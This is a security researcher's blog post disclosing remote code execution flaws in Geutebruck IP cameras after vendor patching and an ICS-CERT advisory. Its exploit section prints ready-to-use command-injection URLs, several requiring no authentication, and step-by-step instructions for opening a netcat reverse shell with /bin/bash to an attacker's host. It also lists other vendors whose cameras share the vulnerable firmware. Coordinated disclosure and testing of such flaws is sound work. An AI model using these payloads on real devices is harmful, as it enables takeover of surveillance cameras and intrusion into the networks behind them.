[0day] Anonymous RCE on Geutebruck IP Cameras – again 2


Abstract

A few months ago during a pentest, with Nicolas Mattiocco of Greenlock, we came across high-end IP cameras made by Geutebruck, a “leading German manufacturer and developer of high-quality, intelligent video security solutions” and found 3 RCE, a blind SQL Injection, a SSRF, a CSRF and a stored XSS affecting version 1.12.0.4 and prior versions. We’ve choose to “responsible disclose” these 0day vulnerabilities, directly to Geutebruck and the ICS-CERT (Industrial Control Systems Cyber Emergency Response Team).  Since then a new firmware has been released (1.12.0.19) to fix that, ICS-CERT has released an advisory and 6 CVE (CVE-2018-7532 – CVE-2018-7528 – CVE-2018-7524 – CVE-2018-7520 – CVE-2018-7516 – CVE-2018-7512) have been assigned.

Many thanks to Geutebruck and ICS-CERT teams.

 

Advisory

« Successful exploitation of these vulnerabilities could lead to proxy network scans, access to a database, adding an unauthorized user to the system, full configuration download including passwords, and remote code execution. (…) ».

https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01

 

Exploit

Since the updated firmware (1.12.0.19) has been released approximatively two month ago (28/02/2018) to Geutebruck customers and the advisory has been published one month ago (20/03/2018) it’s time to release the exploit vectors for the Remote Code Execution vulnerabilities to let you check by yourself.

  • RCE1

Vector #1 (not authenticated):

http://a.a.a.a/uapi-cgi/viewer/simple_loglistjs.cgi?action=get&timekey=1510589250832&1|=2&()%20%7b%20%3a%3b%7d%3b%20ping%201.1.1.1%20-c2=1

Vector #1bis (authenticated):

http://a.a.a.a/uapi-cgi/simple_loglistjs.cgi?action=get&timekey=1510589250832&()%20%7b%20%3a%3b%7d%3b%20ping%201.1.1.1%20-c2=1

  • RCE2

Vector #2:

http://a.a.a.a/uapi-cgi/viewer/admin/testaction.cgi?&type=ip&ip=eth0%20a.a.a.a|ping%20-c%203%201.1.1.1|x

  • RCE3

Vector #3 (not authenticated, CVE-2017-5173 update):

http://a.a.a.a/uapi-cgi/viewer/admin/testaction.cgi?type=ntp&server=%60sleep%203%60

Vector #3bis (authenticated, CVE-2017-5173 update):

http://a.a.a.a/uapi-cgi/admin/testaction.cgi?type=ntp&server=%60sleep%2010%60

To get a reverse shell using this vector:

  1. launch netcat on b.b.b.b host: nc -l 4444
  2. click on the following link after updating a.a.a.a by the IP of your camera and b.b.b.b by the IP of the netcat listening host:

http://a.a.a.a/uapi-cgi/admin/testaction.cgi?type=ntp&server=b.b.b.b%7c%20/bin/nc%20b.b.b.b:4444%20-e%20/bin/bash%202>%20/tmp/err

Screenshot showing the reverse shell access after the RCE exploitation:

A metasploit module should be prepared soon.

 

Mitigation

Geutebruck has released a new software version, Version 1.12.0.19, to address the identified vulnerability, which is available at the following location (registration needed):

http://www.geutebrueck.com/en_EN/login.html

If an update is not possible right now in between users can disable the “Enable anonymous access” option to mitigate the risk. The RCEs will remain but will only be reachable by authenticated users.

In the wild

Many brands use the same firmware (and are vulnerable too):

  • UDP Technology (which is also the supplier of the firmware for the other vendors)
  • Ganz
  • Visualint
  • Cap
  • THRIVE Intelligence

2 commentaires sur “[0day] Anonymous RCE on Geutebruck IP Cameras – again

Les commentaires sont fermés.